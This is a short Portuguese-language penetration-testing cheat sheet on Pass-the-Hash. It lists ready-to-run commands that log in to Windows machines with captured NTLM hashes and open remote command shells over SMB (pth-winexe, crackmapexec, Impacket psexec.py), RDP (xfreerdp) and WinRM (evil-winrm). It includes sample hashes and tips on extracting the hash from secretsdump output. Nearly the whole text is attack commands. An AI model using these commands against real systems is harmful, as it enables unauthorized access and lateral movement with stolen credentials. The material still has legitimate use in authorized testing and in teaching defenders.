Pass The Hash

É uma técnica que permite que o usuário se autentique usando um nome de usuário válido e o hash, em vez da senha decifrada. Portanto, se você adquiriu um hash, poderá usá-lo contra outro sistema.

SMB

pth-winexe

Esse método funciona para contas de domínio do Active Directory e a conta de administrador local interna, então atente-se a isso.

Primeiro vamos passar o hash para uma variável de ambiente, como no exemplo abaixo:

export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896
pth-winexe -U administrator //<ip> cmd

Agora vamos executar o seguinte comando

pth-winexe -U admin/hash:has //<ip> cmd

Também podemos acessar sem definir variáveis, da seguinte maneira:

pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 //<ip> cmd

IMORTANTE: Note que nos comandos acima,temos o hash HTLM (6F403D...) e também temos um outro hash (aad3b435b51404eeaad3b435b51404ee) que nada mais que a parte do hash LM nulo.

crackmapexec

Altere o hash no final. Caso use o secretsdump.py (Impacket) para capturar o hash, utilize somente a quarta parte dele, sendo que as partes são dividas por um : (dois pontos), ou a terceira e quarta parte.

crackmapexec smb <ip> -u <user> -H 58743b11ec7e90e90bd32c72aa7c4e27
crackmapexec smb <ip> -u <user> -H ad43e435bee404ee775db435b51474eb:524beb11e6aa81ab43d32ca7b25c8e4b

PSExec

Caso use o secretsdump.py (Impacket) para capturar o hash, utilize somente a terceira e quarta última parte dele, sendo que as partes são dividas por um : (dois pontos).

python3 psexec.py <domain.local>/<user>@<ip> 'powershell.exe' -hashes ad43e435bee404ee775db435b51474eb:524beb11e6aa81ab43d32ca7b25c8e4b

Remote Desktop

apt-get update
apt-get install freerdp-x11
xfreerdp /u:admin /d:win7 /pth:hash:hash /v:<ip>

WinRM

Evil-WinRM

evil-winrm -i <ip> -u <user> -H <hash>

Last updated